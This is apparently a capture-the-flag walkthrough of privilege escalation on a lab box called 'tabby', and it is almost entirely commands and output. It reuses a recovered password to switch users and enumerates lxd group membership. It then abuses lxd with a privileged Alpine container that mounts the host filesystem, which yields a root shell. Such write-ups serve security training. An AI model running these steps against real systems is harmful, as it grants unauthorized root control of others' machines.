5 tomcat > ash > root

Using password of zip for ash

su - ash
admin@it

whoami;id
ash
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

sudo -l
Sorry, user ash may not run sudo on tabby.

linEnum

[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

We have a folder on desktop called snap which has lxd directory inside.

Using https://www.hackingarticles.in/lxd-privilege-escalation/

[on kali]
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine

= created alpine.tar.gz, move it to target =

[target]
xc image list
+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
lxc image import /home/ash/alpine.tar.gz --alias kashz
lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |          UPLOAD DATE          |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| kashz | a0ea33913002 | no     | alpine v3.14 (20210616_17:12) | x86_64       | CONTAINER | 3.09MB | Jun 17, 2021 at 12:28am (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
lxd init
(enter for all defaults)

lxc init kashz ignite -c security.privileged=true
Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

/bin/sh: whoami;id
root
uid=0(root) gid=0(root)

Last updated